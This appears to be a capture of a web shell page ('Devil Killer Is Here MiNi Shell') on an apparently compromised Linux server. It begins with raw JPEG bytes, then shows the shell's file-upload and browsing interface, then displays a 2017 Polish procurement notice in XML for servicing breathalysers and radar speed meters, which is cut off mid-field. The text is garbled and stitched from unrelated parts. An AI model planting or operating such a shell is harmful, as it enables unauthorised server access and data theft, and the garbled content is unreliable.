JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17087_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17087</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Oddział Zabezpieczenia Żandarmerii Wojskowej</nazwa><ulica>ul. Jana Ostroroga</ulica><nr_domu>35</nr_domu><nr_miesz></nr_miesz><miejscowosc>Warszawa</miejscowosc><kod_poczt>01163 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>mazowieckie</wojewodztwo><tel>261 853 247</tel><fax>261 853 070</fax><email>ozzw.szp@ron.mil.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url></adres_strony_url><podmiot2c></podmiot2c><regon>14238025400000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu></nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>inny: </rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia /><dostep_dokumentow_zamowienia></dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.ozzw.wp.mil.pl</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>T</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Oddział Zabezpieczenia Żandarmerii Wojskowej 01-163 Warszawa, ul. Ostroroga 35</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>USŁUGI W ZAKRESIE SERWISU TECHNICZNEGO, ADIUSTACJI I WZORCOWANIA URZĄDZEŃ I OSPRZĘTU DO BADANIA ZAWARTOŚCI ALKOHOLU W WYDYCHANYM POWIETRZU ORAZ LEGALIZACJI RADAROWYCH MIERNIKÓW PRĘDKOŚCI
</nazwa_zamowienia><numer_referencyjny>RZP/2/PN/S/2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>U</rodz_zam><przedmiot_zam>
Przedmiotem zamówienia są usługi w zakresie serwisu technicznego, adiustacji 
i wzorcowania urządzeń i osprzętu do badania zawartości alkoholu w wydychanym powietrzu oraz legalizacji radarowych mierników prędkości
</przedmiot_zam><cpv1c>50410000-2</cpv1c><cpv2c></cpv2c><okres2c>30/06/2017</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>Termin wykonania zamówienia (zadania 1-7): sukcesywnie według bieżących potrzeb, od daty zawarcia umowy do 30.06.2017 r. – zadanie nr 1 i do 30.11.2017 r. zadania nr 2 – 7.
</informacje_na_temat_katalogow><okreslenie_warunkow>Wykonawca spełni warunek jeżeli wykaże, iż jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w państwie członkowskim Unii Europejskiej, w którym posiada siedzibę, określonych w załączniku XI do dyrektywy 2014/24/UE, lub aby spełniał inne wymogi określone w tym załączniku.</okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Wykonawca spełni warunek jeżeli wykaże, iż zrealizował lub realizuje usługi, odpowiadające swoim rodzajem przedmiotowi zamówienia. 
Informacje szczegółowe dotyczące dokumentów na wykazanie spełniania w/w warunku zawarto w Rozdziale VI SIWZ.
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>N</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3>T</art_24_ust_5_pkt_3><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7>T</art_24_ust_5_pkt_7><art_24_ust_5_pkt_8>T</art_24_ust_5_pkt_8><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający zażąda następujących oświadczeń lub dokumentów:
1.zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2.zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3.odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
4.oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz 
z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
5.oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
6.oświadczenia Wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy Pzp.;
7.oświadczenia Wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy Pzp.;
8.oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
9.na podstawie art. 24 ust. 11 ustawy Pzp. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp., przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. wg wzoru – załącznik do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający zażąda wykazu wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których przedmiot zamówienia został wykonany oraz załączeniem dowodów określających czy przedmiot zamówienia został wykonany lub jest wykonywany należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego świadczenie było wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zamawiający dopuszcza, aby wykaz dotyczył usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych – również wykonywanych, w okresie dłuższym niż 3 lata przed upływem terminu składania ofert. Zamawiający dopuszcza zarówno wykazanie jednej usługi, odpowiadającej swoim rodzajem przedmiotowi niniejszego postępowania i wartości nie mniejszej niż: 156.000,00 zł dla oferty  złożonej na wszystkie zadania od nr 1 do nr 7 lub kilku odpowiadających rodzajowo usług o niższych wartościach na łączną kwotę nie mniejszą niż wymagana. 
W przypadku oferty złożonej na wybrane przez Wykonawcę zadanie wymagane jest wykazanie minimum jednej usługi odpowiadającej swoim rodzajem przedmiotowi niniejszego postępowania i wartości nie mniejszej niż określone poniżej:
dla zadania nr 1 – kwota min. -  67.000,00 zł
dla zadania nr 2 – kwota min. -  11.000,00 zł
dla zadania nr 3 – kwota min. -    2.000,00 zł
dla zadania nr 4 – kwota min. -  59.000,00 zł
dla zadania nr 5 – kwota min. -    4.000,00 zł
dla zadania nr 6 – kwota min. -    6.000,00 zł
dla zadania nr 7 – kwota min. -    7.000,00 zł
</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione></inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci>W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego  w Załączniku nr 1 do SIWZ, Zamawiający zażąda dostarczenia opisu przedmiotu zamówienia, z wyszczególnieniem wszystkich parametrów opisanych przez Zamawiającego w załączniku nr 1 do SIWZ</wykaz_potwierdzenie_okolicznosci><wadium>1.Zamawiający wymaga zabezpieczenia wadium ofert złożonych na zadania nr 1-2 oraz nr 4-7
2.Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium jak następuje: 
na zadanie nr 1 –	2.300,00 PLN
na zadanie nr 2 –	380,00 PLN 
na zadanie nr 3 –	Zamawiający nie wymaga zabezpieczenia oferty wadium
na zadanie nr 4 –	2.000,00 PLN
na zadanie nr 5 –	130,00 PLN 
na zadanie nr 6 –	180,00 PLN
na zadanie nr 7 –	200,00 PLN
3.Wadium może być wniesione w jednej lub w kilku z niżej wymienionych form:
3.1.	pieniądzu,
3.2.	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.3.	gwarancjach bankowych,
3.4.	gwarancjach ubezpieczeniowych,
3.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.2014 poz. 1804 z póź.zm).
4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku 
NBP O/O Warszawa, nr rachunku 98 1010 1010 0135 5013 9120 0000 z dopiskiem 
na przelewie: „Wadium RZP/2/PN/S/2017, zadanie nr………”. O terminie wniesienia wadium, decydować będzie data i godzina wpływu środków na rachunek bankowy Zamawiającego i uznanych na koncie Zamawiającego do upływu terminu składania ofert.
5.	Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
5.1.	pieniądza, dokument potwierdzający wniesienie wadium został załączony do oferty,
5.2.	innej niż pieniądz, oryginał dokumentu został złożony w Oddziale Zabezpieczenia Żandarmerii Wojskowej, Pion Głównego Księgowego, ul. Ostroroga 35, Sekcja Rozliczeń OZŻW, przed terminem składania ofert. Nie należy załączać oryginału dokumentu wadialnego do oferty.
6.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, nieodwołalne, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium 
w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 ustawy Pzp.
7.	Wprowadzenie do gwarancji/poręczenia zapisów warunkujących w jakikolwiek sposób dokonanie przez Gwaranta czynności, skutkować będzie brakiem uznania gwarancji/poręczenia za prawidłowe, chyba że wynikają one z przepisów prawa.
8.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp.
</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych /><czy_wymaga_zlozenie_oferty_wariantowej /><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej /><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>Na podstawie art. 144 ust.1 pkt 1 ustawy Pzp, w przypadkach niezależnych od Zamawiającego, zastrzega się dokonanie zmian treści umowy w zakresie:
1.zmiany miejsca świadczenia przedmiotu zamówienia, w tym zmiany organizacyjne;
2.uzasadnionych zmian w sposobie wykonania przedmiotu zamówienia, proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
3.zmiany terminu realizacji z powodu działań osób trzecich uniemożliwiających wykonanie przedmiotu zamówienia, które  to działania nie są konsekwencją winy którejkolwiek ze Stron umowy. 
4.zmiany w zakresie wynagrodzenia umownego Wykonawcy – w przypadku, gdy wprowadzenie zmian będzie następstwem zmiany stawki podatku od towarów i usług (VAT), mającej zastosowanie w czasie realizacji niniejszej umowy, przy czym zmianie ulegnie kwota podatku VAT i kwota wynagrodzenia brutto Wykonawcy za część przedmiotu umowy wykonywaną po tym terminie, natomiast wartość wynagrodzenia netto pozostanie bez zmian;
5.zmiany w zakresie terminu wykonania przedmiotu umowy – w przypadku zmian 
w strukturze i organizacji Zamawiającego lub Wykonawcy, czy też z powodu działań osób trzecich uniemożliwiających wykonanie przedmiotu zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze Stron umowy, a mają wpływ na termin wykonania przedmiotu umowy;
6.zmiany w zakresie sposobu wykonania przedmiotu zamówienia – jeżeli te zmiany są korzystne dla Zamawiającego i nie wprowadzą warunków, które gdyby zostały ujęte w procedurze przetargowej udzielania zamówienia, umożliwiłyby wybór innej oferty niż ta, która została wybrana pierwotnie;
7.zaistnienia omyłki pisarskiej lub rachunkowej bądź innej omyłki polegającej na niezgodności treści umowy z ofertą;
8.wystąpienia potrzeby zmiany zawartej umowy na skutek okoliczności niezależnych od Stron, których nie można było przewidzieć w dniu zawarcia umowy lub okoliczności zaistnienia siły wyższej;
9.konieczności wprowadzenia innych zmian do umowy niż wyżej wymienione, spowodowanych zmianami w przepisach prawa, normach, dyrektywach, standardach lub zmianami w zakresie wiedzy technicznej, technologicznej lub funkcjonalnej.
Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie aneksu do umowy. 
</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>K1 -cena</kryt_0><kryt_0p>85</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>10/02/2017</data_skl><godz_skl>09:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki></IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6>Klauzula społeczna
